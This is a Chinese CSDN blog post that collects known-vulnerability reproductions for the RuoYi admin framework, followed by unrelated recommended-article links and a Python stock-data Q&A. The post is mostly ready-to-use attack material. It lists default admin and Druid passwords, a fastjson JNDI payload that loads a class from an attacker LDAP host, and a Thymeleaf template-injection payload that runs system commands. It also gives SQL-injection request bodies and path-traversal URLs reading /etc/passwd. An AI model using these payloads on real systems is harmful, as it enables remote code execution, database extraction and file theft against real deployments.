若依nday复现

于 2024-09-17 13:42:38 发布
阅读量139 收藏 2
点赞数 5
分类专栏: nday小合集(持续更新) 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w2vmany/article/details/142309755
版权

前言

声明:此文章仅做学习,未经授权严禁转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关
本文章只做简单汇总,在此感谢其他师傅的文章和分享

前置准备

环境搭建

下载:https://gitee.com/y_project/RuoYi
自行选择版本下载搭建
我这里使用的是别的师傅的搭建的站,就很少截图了

复现

弱口令

1

默认账号密码:admin/admin123 或 ry/admin123

druid监控默认账号信息

请求地址: /druid/*
控制台管理用户名和密码:ruoyi/123456

组件漏洞

在这里插入图片描述
根据上述组件信息,去查找对应漏洞fastjson1.2.74

shiro反序列化

找到默认密钥,然后使用shiro相关利用工具里即可
在这里插入图片描述
在这里插入图片描述

fastjson

漏洞点:系统工具–>代码生成–>导入–>用户和角色关联表—>修改->模版选择数表,其余的都选择用户ID,点击保存
在后面添加即可

POST /tool/gen/edit HTTP/1.1

params%5B@type%5D=org.apache.shiro.jndi.JndiObjectFactory&params%5BresourceName%5D=ldap://vps—ip/Evil

在这里插入图片描述

创建恶意类,具体可查看别的师傅分享的文章,我这里不是很会

Thymeleaf组件漏洞

漏洞影响:RuoYi <= v4.7.1
可知/demo/form/localrefresh/task 存在漏洞
本来是想弹计算器的,但毕竟不是我自己搞的站,就不作截图演示

POST /demo/form/localrefresh/task HTTP/1.1

fragment=header((${T (java.lang.Runtime).getRuntime().exec("需要执行的代码")}))
再对(${T (java.lang.Runtime).getRuntime().exec("需要执行的代码")})进行url编码处理
fragment=header(%28%24%7b%54%20%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%29%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%61%6c%63%22%29%7d%29)

sql注入

1

漏洞影响:RuoYi< 4.6.2
漏洞点:角色管理-》搜索
在这里插入图片描述

POST /system/role/list HTTP/1.1

pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and
extractvalue(1,concat(0x7e,substring((select database()),1,32),0x7e))

或者
POST /system/dept/edit HTTP/1.1

DeptName=1&DeptId=100&ParentId=12&Status=0&OrderNum=1&ancestors=0)or(extractvalue(1,concat((select user()))));#

或者
POST /system/role/export HTTP/1.1

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

2

漏洞影响:4.7.0<x<4.7.5
漏洞点:后台 com/ruoyi/generator/controller/GenController 下的/tool/gen/createTable路由存在sql注入
在这里插入图片描述

sql=CREATE table ss1 as SELECT/**/* FROM sys_job WHERE 1=1 union/**/SELECT/**/extractvalue(1,concat(0x7e,(select/**/version()),0x7e));

任意文件下载

RuoYi<4.5.1

/common/download/resource?resource=/profile/../../../../etc/passwd 
/common/download/resource?resource=/profile/../../../../Windows/win.ini
/common/download/resource?resource=/profile/../../../../xxx

监控信息泄露

在这里插入图片描述

swagger

http://xxx/swagger-ui.html
http://xx/v2/api-docs

石灰11
关注
专栏目录
【漏洞复现】Pyspider webui未授权访问导致RCE
Fly_鹏程万里
06-20 264
Pyspider是一个采用Python语言编写的爬虫系统,功能非常强大,它采用分布式架构,支持多种数据库后端,强大的WebUI支持脚本编辑器,任务监视器,项目管理器以及结果查看器,而偏偏有些开发人员把这个webui开到公网上面,而webui本身没有任何形式的验证机制并且允许远程执行python代码漏洞检测反弹shell。
【漏洞复现】Hadoop 未授权访问到RCE
Fly_鹏程万里
06-20 263
Hadoop Hadoop是一个开源的分布式计算框架,用于存储和处理大规模数据集,它提供了可靠、可扩展和高性能的数据处理能力,使得用户可以在廉价的硬件集群上进行大数据处理和分析,Hadoop适用于处理大规模的结构化和非结构化数据并且在处理大数据集时具有良好的可扩展性和容错性,它被广泛应用于互联网公司、科学研究、金融行业等领域,用于大数据处理、日志分析、机器学习和数据挖掘等任务,而由于服务器直接在开放了Hadoop机器HDFS的50070 Web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,
Nday】Spring-Cloud-SpEL-RCE漏洞复现
wwang135的博客
03-30 4464
Spring-Cloud-SpEL-RCE漏洞复现
nday】用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞复现
伏一
05-22 278
"用友 U8 OA"
网络安全之SQL注入漏洞复现(上篇)(技术进阶)
weixin_70911257的博客
04-12 1630
SQL注入(SQL Injection)是一种常见的网络攻击手段,是因为应用程序对用户输入的数据验证不到位造成的。攻击者在应用程序的输入字段中插入恶意的SQL代码,在应用程序未授权的情况下执行任意的SQL语句。
【漏洞复现】Jupyter Notebook未授权访问到RCE
Fly_鹏程万里
06-20 204
Jupyter Notebook(此前被称为IPython notebook)是一个交互式笔记本,支持运行40多种编程语言,Jupyter Notebook的本质是一个Web应用程序,便于创建和共享程序文档,支持实时代码,数学方程,可视化和 markdown,如果管理员未为Jupyter Notebook配置密码将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
深信服数据中心管理系统 XXE漏洞复现
0xSec
08-16 2403
深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击,获取系统敏感信息。
Nday--CVE-2020-16898(TCP/IP远程代码执行漏洞)
Vdieoo的博客
11-18 530
CVE-2020-16898 TCP/IP远程代码执行漏洞 https://github.com/XTaiQue/CVE-2020-16898--EXP-POC poc ,exp 完整学习:https://www.freebuf.com/articles/system/252263.html 以下我的复现过程:
C++学习笔记----6、内存管理(五)---- 智能指针(3)
weixin_71738303的博客
09-11 1187
与指向特定类型的原始指针可以转化为不同类型的指针一样,shared_ptr保存特定的类型可以转化为一个另一种类型的shared_ptr。转化shared_ptr的函数是const_pointer_cast(),dynamic_pointer_cast(),static_pointer_cast()和reinterpret_pointer_cast()。前面简要提过,当拥有共享属主的智能指针,例如shared_ptr不在活动范围或者被重置时,只有它是最后指向的智能指针时才能释放其指向的资源。
ROS组合导航笔记1:融合传感器数据
最新发布
qq_44188415的博客
09-16 572
笔记
shader 案例学习笔记之将坐标系分成4个象限
localhost
09-13 214
坐标系被分成了4个单元格,每个单元格都有唯一的索引,后续就可以根据索引去渲染。
arm和riscv系统调用对比(笔记)
maosql
09-13 569
相似之处: ecall 和 SVC 都是用于从用户模式切换到内核模式,执行系统调用。它们的作用和使用方式非常相似,都是触发内核级别的处理,以处理用户请求的特权操作。不同之处: PendSV 是一个用于任务切换的中断机制,与 ecall 和 SVC 的作用不同。PendSV 主要用于上下文切换,而 ecall 和 SVC 是用于请求系统服务的机制。
JUC学习笔记(二)
zhouDonQuixote的博客
09-16 1083
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录四、共享模型之内存4.1 Java 内存模型4.2 可见性退不出的循环解决方法可见性 vs 原子性模式之 Balking1.定义2.实现4.3 有序性原理之指令级并行1. 名词2.鱼罐头的故事3.指令重排序优化4.支持流水线的处理器诡异的结果解决方法原理之 volatile1.如何保证可见性2.如何保证有序性3.double-checked locking 问题4.double-checked locking 解决happens-
C++学习笔记----7、使用类与对象获得高性能(一)---- 书写类(1)
weixin_71738303的博客
09-13 1063
public:private:第一行指出这是一个叫做spreadsheet_cell的模块的定义。每一类的定义都是以class关键字开始后接类的名字。如果类定义在一个模块中,该类一定要import进来才可见,定义时一定要在class关键字之前加上export。类的定义就是声明并且以分号结束。类的定义通常在一个其名字的文件中。例如,SpreadsheetCell类定义在一个叫做SpreadsheetCell.cppm的文件中。有些编译器要求使用特定的扩展名;有些则不要求。
Netty笔记03-组件Channel
weixin_46425661的博客
09-12 804
本文主要讲解Netty中的组件Channel、ChannelFuture和CloseFuture
17、电科院FTU检测标准学习笔记-录波性能
sixtome
09-14 636
作者简介:本人从事电力系统多年,岗位包含研发,测试,工程等,具有丰富的经验在配电自动化验收测试以及电科院测试中,本人全程参与,积累了不少现场的经验。
rk3568系统buildroot开发笔记
Reasonss的博客
09-11 1265
构建RK3568系统期间遇到的各种问题,我主要分为编译问题和运行问题
【学习笔记】SSL密码套件之哈希
Taki_UP的博客
09-12 1189
本篇介绍了TLS/SSL密码套件中常用的哈希算法,包括Poly1305、SHA384、SHA256、SHA、MD5
#encoding:gbk import pandas as pd import numpy as np import talib import datetime import time import sys sys.path.append(r'D:\国信\国信iQuant策略交易平台\bin.x64\Lib\site-packages') import pymysql stocklist = ['002587.SZ', '300548.SZ', '301046.SZ', '001287.SZ', '300052.SZ', '300603.SZ', '300926.SZ', '300605.SZ', '300826.SZ', '301049.SZ'] def init(ContextInfo): ContextInfo.accID = "410001212417" #str(account) 交易帐号 ContextInfo.buy = True ContextInfo.sell = False today = datetime.datetime.now().strftime('%Y-%m-%d') #定义时间 order_time = today + ' 19:06:30' #定义时间 买股票 ContextInfo.run_time("myHandlebar", '1nDay', order_time, "SZ") #一天执行一次定义的myHandlebar def myHandlebar(ContextInfo): try: db = pymysql.connect(host='127.0.0.1', user='user', password='123456', db='python') print('数据库连接成功') except pymysql.Error as e: print('数据库连接失败') def get_stock_data(stock): G1 = ContextInfo.get_full_tick([stock]) # 获取分笔数据 G2 = [stock, G1[stock]['lastPrice'], G1[stock]['lastClose'], G1[stock]['pvolume']] # 最新 收盘 成交量 G3 = ContextInfo.get_last_volume(stock) # 总流通股 G4 = ContextInfo.get_instrumentdetail(stock) # 财表 G5 = [G4['TotalVolumn']] # 总股本 S1 = [G2[1] / G2[2] * 100 - 100] #涨幅 S2 = [G2[3] / G3 * 100] #换手率 S3 = [G2[1] * item for item in G5] #总市值 return [S1, S2, S3] stock_data = {} for stock in stocklist: stock_data[stock] = get_stock_data(stock) print(stock_data) 我打代码是这样,打印出来的结果是:{'002587.SZ': [[1.0479041916167802], [1.9914331748339686], [4397895000.0]], '300548.SZ': [[-3.7646314457450103], [9.90358201249419], [8700728400.0]], '301046.SZ': [[1.8993668777074362], [2.722894468951476], [4577520200.0]], '001287.SZ': [[0.9848484848484986], [4.357778802843653], [20258934000.0]], '300052.SZ': [[0.16330974414806576], [1.3332567665862716], [4818040000.000001]], '300603.SZ': [[0.3496503496503607], [1.4677953941892266], [5335789200.0]], '300926.SZ': [[-0.25839793281653556], [6.75514802163393], [6457471200.0]], '300605.SZ': [[-0.13888888888888573], [1.495405645304456], [2364934800.0]], '300826.SZ': [[8.338480543545373], [15.573514174701398], [2553824000.0]], '301049.SZ': [[-8.936698386429455], [19.581253894080998], [2074442500.0000002]]},在这代码的基础上,帮我把其中的'002587.SZ'对应的数值打印出来
07-25
当你想要打印出`'002587.SZ'`对应的数值时,你可以使用以下代码: ```python stock_data = { '002587.SZ': [[1.0479041916167802], [1.9914331748339686], [4397895000.0]], '300548.SZ': [[-3.7646314457450103], [9.90358201249419], [8700728400.0]], '301046.SZ': [[1.8993668777074362], [2.722894468951476], [4577520200.0]], '001287.SZ': [[0.9848484848484986], [4.357778802843653], [20258934000.0]], '300052.SZ': [[0.16330974414806576], [1.3332567665862716], [4818040000.000001]], '300603.SZ': [[0.3496503496503607], [1.4677953941892266], [5335789200.0]], '300926.SZ': [[-0.25839793281653556], [6.75514802163393], [6457471200.0]], '300605.SZ': [[-0.13888888888888573], [1.495405645304456], [2364934800.0]], '300826.SZ': [[8.338480543545373], [15.573514174701398], [2553824000.0]], '301049.SZ': [[-8.936698386429455], [19.581253894080998], [2074442500.0000002]] } data = stock_data['002587.SZ'] print(data) ``` 运行这段代码,你将会得到`'002587.SZ'`对应的数值`[[1.0479041916167802], [1.9914331748339686], [4397895000.0]]`的输出结果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值